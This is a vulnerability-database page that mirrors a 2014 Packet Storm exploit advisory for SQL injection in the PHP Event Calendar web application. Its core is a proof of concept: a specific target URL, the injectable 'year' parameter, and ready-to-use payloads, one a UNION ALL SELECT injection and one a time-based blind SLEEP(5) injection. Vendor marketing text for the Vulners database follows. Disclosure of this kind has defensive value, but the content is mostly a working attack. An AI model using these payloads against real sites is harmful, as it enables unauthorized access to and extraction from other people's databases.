Lucene search
K

PHP Event Calendar SQL Injection

🗓️ 14 Apr 2014 00:00:00Reported by Daniel GodoyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

PHP Event Calendar SQL Injection vulnerability. Exploited through Union query and time-based blind injection

Code
`# Exploit Title: PHP Event Calendar / SQL Injection Vulnerability#  
Date: 14/04/2014# Author: Daniel Godoy# Author Mail:  
danielgodoy[at]GobiernoFederal[dot]com# Author Web:  
www.delincuentedigital.com.ar# Software: PHP Event Calendar# Software  
Link: http://codecanyon.net/item/php-event-calendar/47723# Tested on:  
Linux  
[Comment]Greetz: Ariel Orellana www.remoteexecution.net  
www.remoteexcution.com.ar [PoC] http://envato.jigowatt.co.uk/code/calendar/day_view.php?day=23&month=4&year=2014  
Place: GETParameter: year Type: UNION query Title: MySQL  
UNION query (NULL) - 1 to 10 columns Payload:  
day=23&month=4&year=2014' UNION ALL SELECT NULL, NULL, NULL, NULL,  
NULL, NULL,  
CONCAT(CHAR(58,100,120,121,58),IFNULL(CAST(CHAR(113,68,117,66,112,104,104,66,114,109)  
AS CHAR),CHAR(32)),CHAR(58,115,104,115,58)), NULL# AND 'JNPR'='JNPR  
Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND  
time-based blind Payload: day=23&month=4&year=2014' AND SLEEP(5)  
AND 'PIGb'='PIGb  
  
-------------------------  
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Apr 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
20